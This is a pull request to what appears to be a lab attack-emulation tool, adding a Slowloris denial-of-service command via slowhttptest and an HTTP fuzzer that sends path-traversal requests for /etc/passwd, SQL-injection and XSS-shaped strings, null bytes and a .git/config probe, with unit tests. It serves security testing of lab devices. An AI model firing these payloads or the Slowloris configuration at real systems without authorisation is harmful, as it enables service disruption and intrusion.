### PR TITLE
feat: application-layer attacks (Slowloris, HTTP fuzz/traversal)

### DIFF
--- a/README.md
+++ b/README.md
@@ -164,6 +164,7 @@ Each attack is defined by a `kind` field and mapped to an executor:
 
 * `command` executes external binaries such as `nmap` or `hping3`
 * `hulk` runs an in-process HTTP flood (HULK) against the target device; configurable via `duration_seconds` and `thread_count`
+* `http_fuzz` sends malformed/fuzzed and traversal HTTP requests (`paths`) to a device's web UI on a configurable `port`
 * `placeholder` is a disabled stub for attacks not yet implemented (cannot be `enabled: true`)
 * additional attack types can be added via the registry
 

--- a/configs/attacks.yaml
+++ b/configs/attacks.yaml
@@ -57,6 +57,44 @@ attacks:
     repeats: 3
     duration_seconds: 60
 
+  # Application-layer (#77)
+  - name: slowloris
+    label: Slowloris
+    enabled: true
+    repeats: 3
+    command:
+      - slowhttptest
+      - -c
+      - "1000"
+      - -H
+      - -i
+      - "10"
+      - -r
+      - "200"
+      - -t
+      - GET
+      - -u
+      - http://{target_ip}/
+      - -x
+      - "24"
+      - -p
+      - "3"
+
+  - name: http_fuzz
+    label: HTTP_Fuzz
+    kind: http_fuzz
+    enabled: true
+    repeats: 3
+    port: 80
+    paths:
+      - /../../../../etc/passwd
+      - /..%2f..%2f..%2f..%2fetc%2fpasswd
+      - "/'; DROP TABLE users;--"
+      - "/<script>alert(1)</script>"
+      - /%00
+      - /.git/config
+    timeout_seconds: 5
+
   # - name: http_request
   #   label: HTTP_Request
   #   enabled: false

--- a/src/capex/attacks/application_layer.py
+++ b/src/capex/attacks/application_layer.py
@@ -1,0 +1,42 @@
+from __future__ import annotations
+
+import socket
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from capex.models import DeviceConfig, HttpFuzzAttackConfig
+
+_RECV_BUFFER = 1024
+
+
+class HttpFuzzExecutor:
+    """Sends malformed/fuzzed and traversal HTTP requests to a device's web UI."""
+
+    def __init__(self, *, attack: HttpFuzzAttackConfig) -> None:
+        self._attack = attack
+
+    def execute(self, *, device: DeviceConfig) -> str | None:
+        host = str(device.ip)
+        response_count = 0
+
+        for path in self._attack.paths:
+            request = f'GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n'.encode()
+
+            try:
+                sock = socket.create_connection((host, self._attack.port), timeout=self._attack.timeout_seconds)
+            except OSError:
+                continue
+
+            with sock:
+                sock.settimeout(self._attack.timeout_seconds)
+                sock.sendall(request)
+                try:
+                    data = sock.recv(_RECV_BUFFER)
+                except TimeoutError:
+                    data = b''
+
+            if data:
+                response_count += 1
+
+        return f'requests={len(self._attack.paths)}, responses={response_count}'

--- a/src/capex/attacks/registry.py
+++ b/src/capex/attacks/registry.py
@@ -2,6 +2,7 @@ from __future__ import annotations
 
 from typing import TYPE_CHECKING
 
+from capex.attacks.application_layer import HttpFuzzExecutor
 from capex.attacks.builtins import CommandAttackExecutor, PlaceholderAttackExecutor
 from capex.attacks.hulk import HulkAttackExecutor
 from capex.exceptions import RegistryError
@@ -29,6 +30,10 @@ class AttackRegistry:
                 )
             case 'hulk':
                 return HulkAttackExecutor(
+                    attack=attack,
+                )
+            case 'http_fuzz':
+                return HttpFuzzExecutor(
                     attack=attack,
                 )
             case _:

--- a/src/capex/models.py
+++ b/src/capex/models.py
@@ -48,7 +48,20 @@ class HulkAttackConfig(BaseModel):
     thread_count: PositiveInt = 100
 
 
-AttackConfig = CommandAttackConfig | PlaceholderAttackConfig | HulkAttackConfig
+class HttpFuzzAttackConfig(BaseModel):
+    model_config = ConfigDict(extra='forbid')
+
+    kind: Literal['http_fuzz'] = 'http_fuzz'
+    name: str = Field(min_length=1)
+    label: str = Field(min_length=1)
+    enabled: bool = True
+    repeats: PositiveInt = 3
+    port: PositiveInt = 80
+    paths: list[str] = Field(min_length=1)
+    timeout_seconds: PositiveInt = 5
+
+
+AttackConfig = CommandAttackConfig | PlaceholderAttackConfig | HulkAttackConfig | HttpFuzzAttackConfig
 
 
 class AttackFile(BaseModel):

--- a/tests/test_application_layer.py
+++ b/tests/test_application_layer.py
@@ -1,0 +1,100 @@
+from __future__ import annotations
+
+from capex.attacks import application_layer
+from capex.models import DeviceConfig, HttpFuzzAttackConfig
+
+
+class _FakeTcpSocket:
+    def __init__(self, *, recv_data: bytes = b'HTTP/1.1 404 Not Found\r\n') -> None:
+        self._recv_data = recv_data
+        self.sent: bytes = b''
+
+    def settimeout(self, timeout: float) -> None:
+        pass
+
+    def sendall(self, data: bytes) -> None:
+        self.sent = data
+
+    def recv(self, bufsize: int) -> bytes:
+        return self._recv_data
+
+    def __enter__(self) -> _FakeTcpSocket:
+        return self
+
+    def __exit__(self, *exc_info: object) -> None:
+        pass
+
+
+class _FakeSocketFactory:
+    def __init__(self, items: list) -> None:
+        self._items = list(items)
+        self.addresses: list[tuple[str, int]] = []
+
+    def __call__(self, address, timeout):
+        self.addresses.append(address)
+        item = self._items.pop(0)
+        if isinstance(item, Exception):
+            raise item
+        return item
+
+
+def test_http_fuzz_executor_sends_all_configured_paths(monkeypatch) -> None:
+    sockets = [_FakeTcpSocket(), _FakeTcpSocket()]
+    factory = _FakeSocketFactory(sockets)
+    monkeypatch.setattr(application_layer.socket, 'create_connection', factory)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = HttpFuzzAttackConfig(
+        name='http_fuzz',
+        label='HTTP_Fuzz',
+        port=80,
+        paths=['/../../../../etc/passwd', "/'; DROP TABLE users;--"],
+    )
+    executor = application_layer.HttpFuzzExecutor(attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert detail == 'requests=2, responses=2'
+    assert factory.addresses == [('192.168.1.1', 80), ('192.168.1.1', 80)]
+    assert sockets[0].sent == b'GET /../../../../etc/passwd HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\r\n'
+    assert sockets[1].sent == b"GET /'; DROP TABLE users;-- HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\r\n"
+
+
+def test_http_fuzz_executor_counts_recv_timeout_as_no_response(monkeypatch) -> None:
+    class _TimingOutSocket(_FakeTcpSocket):
+        def recv(self, bufsize: int) -> bytes:
+            raise TimeoutError
+
+    factory = _FakeSocketFactory([_TimingOutSocket()])
+    monkeypatch.setattr(application_layer.socket, 'create_connection', factory)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = HttpFuzzAttackConfig(
+        name='http_fuzz',
+        label='HTTP_Fuzz',
+        port=80,
+        paths=['/slow'],
+    )
+    executor = application_layer.HttpFuzzExecutor(attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert detail == 'requests=1, responses=0'
+
+
+def test_http_fuzz_executor_counts_unreachable_path_as_no_response(monkeypatch) -> None:
+    factory = _FakeSocketFactory([ConnectionRefusedError(), _FakeTcpSocket()])
+    monkeypatch.setattr(application_layer.socket, 'create_connection', factory)
+
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = HttpFuzzAttackConfig(
+        name='http_fuzz',
+        label='HTTP_Fuzz',
+        port=80,
+        paths=['/nope', '/ok'],
+    )
+    executor = application_layer.HttpFuzzExecutor(attack=attack)
+
+    detail = executor.execute(device=device)
+
+    assert detail == 'requests=2, responses=1'

--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -2,7 +2,7 @@ from __future__ import annotations
 
 from ipaddress import IPv4Address
 
-from capex.models import CommandAttackConfig, DeviceConfig
+from capex.models import CommandAttackConfig, DeviceConfig, HttpFuzzAttackConfig
 
 
 def test_device_config_validates() -> None:
@@ -17,3 +17,13 @@ def test_attack_config_validates() -> None:
         command=['hping3', '--udp', '-c', '100', '-p', '53', '{target_ip}'],
     )
     assert attack.repeats == 3
+
+
+def test_http_fuzz_attack_config_defaults() -> None:
+    attack = HttpFuzzAttackConfig(
+        name='http_fuzz',
+        label='HTTP_Fuzz',
+        paths=['/../../../../etc/passwd'],
+    )
+    assert attack.port == 80
+    assert attack.timeout_seconds == 5

--- a/tests/test_registry.py
+++ b/tests/test_registry.py
@@ -4,11 +4,12 @@ import types
 
 import pytest
 
+from capex.attacks.application_layer import HttpFuzzExecutor
 from capex.attacks.builtins import CommandAttackExecutor, PlaceholderAttackExecutor
 from capex.attacks.hulk import HulkAttackExecutor
 from capex.attacks.registry import AttackRegistry
 from capex.exceptions import RegistryError
-from capex.models import CommandAttackConfig, HulkAttackConfig, PlaceholderAttackConfig
+from capex.models import CommandAttackConfig, HttpFuzzAttackConfig, HulkAttackConfig, PlaceholderAttackConfig
 from capex.runner import CommandRunner
 
 
@@ -45,6 +46,17 @@ def test_registry_resolves_hulk_attack() -> None:
     )
     resolved = registry.resolve(attack)
     assert isinstance(resolved, HulkAttackExecutor)
+
+
+def test_registry_resolves_http_fuzz_attack() -> None:
+    registry = AttackRegistry(CommandRunner())
+    attack = HttpFuzzAttackConfig(
+        name='http_fuzz',
+        label='HTTP_Fuzz',
+        paths=['/../../../../etc/passwd'],
+    )
+    resolved = registry.resolve(attack)
+    assert isinstance(resolved, HttpFuzzExecutor)
 
 
 def test_registry_raises_registry_error_for_unsupported_kind() -> None:


### PR DESCRIPTION
Part of the attack-library expansion roadmap in #66. Resolves #77.

## Summary
- `slowloris` added to `attacks.yaml` (`kind: command`, real `slowhttptest` binary, no new code) — layer-7 DoS, distinct from the existing volumetric floods.
- New native executor `HttpFuzzExecutor` (`kind: http_fuzz`): sends a configurable list of malformed/fuzzed and directory-traversal HTTP requests (path traversal, SQLi-shaped, XSS-shaped, null-byte, `.git/config` probe) to a device's web UI and reports `requests=N, responses=M`.
- Registered in `AttackRegistry`, added to the `AttackConfig` union, documented in README.

MITRE: T1499.002/.004 Application/Protocol Exhaustion Flood, T1190 Exploit Public-Facing Application.

Real tools/traffic — real `slowhttptest`, real crafted HTTP requests over real TCP connections to real lab devices.

## Test plan
- [x] `uv run pytest` — full suite green (80 tests)
- [x] `uv run pytest --cov=capex` — `application_layer.py` and `registry.py` both 100%
- [x] `uv run ruff format . && uv run ruff check .` — clean
- [x] `uv run capex --dry-run` — confirms `configs/attacks.yaml` loads/validates with both new entries

I'll merge this manually; will close #77 with a comment linking the merge afterward.